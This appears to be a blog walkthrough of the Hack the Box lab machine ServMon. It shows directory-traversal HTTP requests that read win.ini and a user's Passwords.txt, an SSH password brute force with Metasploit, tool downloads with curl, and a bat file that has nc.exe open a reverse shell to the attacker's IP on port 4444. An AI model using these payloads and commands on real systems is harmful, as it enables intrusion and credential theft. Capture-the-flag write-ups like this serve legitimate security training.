Welcome back everyone! Today we are going to be doing the Hack the Box machine - ServMon. This is list as an easy Windows machine. Let's see what's in store!
As usually we start out with our
nmap -sC -sV -p- -oA allscan 10.10.10.184
Here are our results:
We see that there is something hosted on port 80 as well as anonymous login enabled for our FTP service. So we'll log into the FTP and see what's inside the Users folder we're show in our scan. Once logged in we start pathing through the directory. We get two user names Nathan and Nadine. Inside each of their directories are two files, so we download them to see what might be inside.
We look at the files and see some notes:
We know that the service being hosted on port 80 is NVMS. We can do a quick
searchsploit for NVMS and see there are a few exploits that pop up.
We can mirror this last exploit to our working directory with the
searchsploit 48311 -m
The number 48311 corresponds to the name of the exploit.
Once we have the exploit copied, we can look at the code. We see it's simply appending our standard traveral and asking for our file to get. Now when I tried to run this in Python, I ran into quite a few errors. I did a minor re-write and was still getting errors. I plan on circling back around to this after this post :).
Since the traversal is very basic, we can replicate it via
Burpsuite. We'll use the example that we are given int he PoC from earlier. Here's the request we issue:
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 Host: 10.10.10.184 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: dataPort=undefined Upgrade-Insecure-Requests: 1
Now that we know this traveral is working, we need to get something of use. We read earlier that there is a Passwords.txt file on Nathan's desktop. This is the file we will get. Here's the request used:
GET /../../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1 Host: 10.10.10.184 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: dataPort=undefined Upgrade-Insecure-Requests: 1
Now that we have a list of passwords we will save them to a file. Now we try them against NVMS to login as Nadine, Nathan and Admin but none work. The SSH port is open as well so we can try to bruteforce our way into that while we're at it. There are a few ways to do this either the
Metasploit module for logging in or
Hydra. In this case I'll use
msf5> use auxiliary/scanner/ssh/ssh_login
msf5> set pass_file passwords
msf5> set username Nathan
msf5> set rhost 10.10.10.184
We run the command but nothing shows up, so we change our username value to nadine.
msf5> set username nadine
This comes back with a hit! We could have just put both usernames in a file and supplied that list insead rather than running the module twice.
We then SSH in as this user and get our user.txt flag.
Once we have that we will start enumerating. We'll spin up a
SimpleHTTPServer and download
WinPEAS.bat to the system. I tried a few ways of getting the file over,
powershell but it ended up being as simple as useing the
-o flag on the built in
curl http://10.10.14.202/winPEAS.bat -o "C:\Temp\win.bat"
We then run the file. A majority of functions get denied but there is still some usefull information here. We see there is a service running on port 8443 that doesn't match our
While the rest of the scan runs, we'll head over to port 8443 and see what might be on it. An attempt at getting there via HTTP does not work, HTTPS is required.
Nothing seems to be loading on this page however. We do another
searchsploit for NSClient and come back with a local windows exploit for escalation. We see that we can obtain a password from the
nsclient.ini file or via a command
We run the command to obtain the password:
nscp web password --display
We're also going to look at the ini file for any other useful information. There is one additional piece of information we need inside this file. The allowed hosts is set to local hosts only.
This means we'll need to setup some port forwarding to access the page.
ssh -L 9000:127.0.0.1:8443 email@example.com
Here's a breakdown of the above command if you're new to using it. There's also some additional info here.
We are telling SSH to map our local (
-L) port of
9000 to our local machine and forward it to port
8443 on our remote machine. We then supply the credentials of the remote machine -
firstname.lastname@example.org. So when we open a web browser and go to 127.0.0.1:9000 we should be redirected to the NSClient page as if we were on it locally.
Once we load up the page, we can see the differences:
We can now use the password we found earlier (via the command or .ini file) to log in. It looks like we can now follow this PoC and escalate. First we need to create an
evil.bat file as per the PoC. In this case I'll call my file
rf.bat. Inside this bat is the follow:
@echo off C:\Temp\nc.exe 10.10.14.202 4444 -e cmd.exe
This file simply tells the netcat binary (that we'll put there next) to reach back to us with a command prompt.
Now we need to download the nc.exe file to temp, the same way we copied over the
curl http://10.10.14.202/nc.exe -o "C:\Temp\nc.exe"
Now we setup a listen on our local machine.
nc -lvnp 4444
Now we need to add a script to the NSClient (Step 5 in the PoC). This will call our evil bat file.
Now to add to schedule a task to call the script (Step 6).
Now I would have loved to finish this box however this step was pretty close to impossible on public boxes. I don't plan to come back and finish this machine given the bad taste it left.